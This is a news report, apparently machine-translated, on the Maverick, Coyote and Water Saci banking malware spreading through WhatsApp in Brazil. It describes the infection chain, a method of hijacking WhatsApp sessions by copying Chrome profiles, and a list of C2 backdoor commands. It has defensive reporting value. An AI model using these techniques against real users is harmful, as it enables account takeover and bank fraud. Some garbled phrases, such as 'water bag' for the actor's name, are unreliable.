Threat hunters have discovered similarities between banking malware called Coyote and a newly released malicious program called Maverick that was propagated via WhatsApp.
According to a report by CyberProof, both malware are written in .NET, target users and banks in Brazil, and have identical functionality to target and decrypt bank URLs and monitor bank applications. More importantly, both include the ability to spread through WhatsApp Web.
Maverick was first documented by Trend Micro early last month and was attributed to a threat actor known as “Maverick.” water bag. This campaign includes two components. Self-propagating malware called SORVEPOTEL. It is used to spread through the desktop web version of WhatsApp and deliver ZIP archives containing the Maverick payload.
The malware is designed to monitor active browser window tabs for URLs that match a hardcoded list of Latin American financial institutions. Once the URL matches, it establishes a connection with the remote server, fetches subsequent commands to collect system information, and serves a phishing page to steal credentials.
In a subsequent report, cybersecurity firm Sophos first raised the possibility that this activity could be related to a previously reported campaign that spread Coyote targeting users in Brazil, and whether Maverick is an evolved version of Coyote. A separate Kaspersky analysis found that Maverick does contain a lot of code that overlaps with Coyote, but noted that Maverick is being treated as an entirely new threat targeting Brazil all together.
CyberProof’s latest findings show that the ZIP file contains a Windows shortcut (LNK) that, when launched by the user, runs cmd.exe or PowerShell to connect to an external server (‘zapgrande(.)com’) and download the first stage payload. PowerShell scripts can launch intermediate tools designed to disable Microsoft Defender Antivirus and UAC, or retrieve the .NET loader.
The loader includes anti-analysis technology that checks for the presence of reverse engineering tools and self-terminates if one is found. The loader then begins downloading the attack’s main modules, SORVEPOTEL and Maverick. It is worth mentioning here that Maverick only installs after confirming that the victim is located in Brazil by checking the time zone, language, region, date and time format of the infected host.
Cyberproof said it also found evidence that the malware was used to identify hotels in Brazil, suggesting its targeting could expand.
This disclosure comes as Trend Micro details a new attack chain for Water Saci that employs an email-based command and control (C2) infrastructure, relies on multi-vector persistence for resiliency, and incorporates several advanced checks to evade detection, enhance operational stealth, and limit execution to Portuguese systems only.
“The new attack chain also features advanced remote command and control systems that allow attackers real-time management, including pausing, resuming, and monitoring malware campaigns, effectively turning infected machines into botnet tools that can be operated collaboratively and dynamically across multiple endpoints,” the cybersecurity firm said in a report released late last month.
 |
| New Water Saci attack chain observed |
This infection sequence avoids .NET binaries and uses Visual Basic Script (VB Script) and PowerShell to hijack WhatsApp browser sessions and spread ZIP files via the messaging app. Similar to previous attack chains, WhatsApp web hijacking is performed by downloading ChromeDriver and Selenium for browser automation.
This attack is triggered when a user downloads and unzips a ZIP archive. It contains an obfuscated VBS downloader (‘Orcamento.vbs’, aka SORVEPOTEL) that issues PowerShell commands to download and execute a PowerShell script (‘tadeu.ps1’) directly into memory.
This PowerShell script is used to take control of the victim’s WhatsApp web session and distribute a malicious ZIP file to all contacts associated with that account, while also displaying a deceptive banner named “WhatsApp Automation v6.0” to hide its malicious intent. Additionally, the script connects to the C2 server to retrieve message templates and extract the contact list.
“After terminating existing Chrome processes and clearing old sessions to ensure clean operation, the malware copies the victim’s legitimate Chrome profile data to a temporary workspace,” Trend Micro said. “This data includes cookies, authentication tokens, and saved browser sessions.”
 |
| Water Saci Campaign Timeline |
“This technique allows the malware to completely bypass WhatsApp Web authentication and instantly gain access to the victim’s WhatsApp account without raising any security alerts or requiring QR code scanning.”
The malware also implements advanced remote control mechanisms that allow attackers to pause, resume, and monitor WhatsApp propagation in real time, effectively turning compromised hosts into malware that can control them like bots, the cybersecurity firm added.
As for how the ZIP archive is actually distributed, the PowerShell code iterates through all collected contacts, replaces variables in the message template with a time-based greeting and the contact’s name, and checks for a pause command before sending the personalized message.
Another important aspect of SORVEPOTEL is that it utilizes an IMAP connection to the terra.com(.)br email account using hard-coded email credentials to connect to the email account and retrieve commands, rather than using traditional HTTP-based communication. Some of these accounts are secured using multi-factor authentication (MFA) to prevent unauthorized access.
This added layer of security is said to have caused operational delays as attackers had to manually enter a one-time authentication code at each login to access the inbox and store the C2 server URL used to send commands. The backdoor then periodically polls the C2 server to obtain instructions. The list of supported commands is:
- INFO, collects detailed system information
- CMD: Executes a command via cmd.exe and exports the execution result to a temporary file.
- POWERSHELL, run the PowerShell command.
- SCREENSHOT, take a screenshot
- TASKLIST, enumerate all running processes
- KILL, terminate a specific process
- LIST_FILES, enumerate files/folders.
- DOWNLOAD_FILE, downloads files from infected systems
- UPLOAD_FILE, uploads a file to the infected system
- DELETE, delete a specific file/folder
- RENAME, rename a file/folder
- COPY, copy a file/folder
- MOVE, move a file/folder
- FILE_INFO, get detailed metadata about a file
- SEARCH, recursively searches for files matching the specified pattern
- CREATE_FOLDER, create a folder
- REBOOT, initiates a system reboot with a 30 second delay.
- SHUTDOWN, initiates system shutdown with a 30 second delay.
- UPDATE, download and install an updated version of itself
- CHECK_EMAIL, checks for new C2 URLs in attacker-controlled emails.
The widespread nature of the campaign is driven by the popularity of WhatsApp in Brazil, which has more than 148 million active users, making it the world’s second-largest market after India.
Trend Micro said that “the evolution of infection methods and ongoing tactics, as well as regionally focused targeting, indicate that Water Saci is likely associated with Coyote, with both campaigns operating within the same Brazilian cybercrime ecosystem,” and that the attackers are aggressive in “quantity and quality.”
“Coupling the Water Saci campaign with Coyote provides a picture of a major shift in how banking Trojans propagate. Threat actors are moving from relying on traditional payloads to exploiting legitimate browser profiles and messaging platforms for stealthy, scalable attacks.”
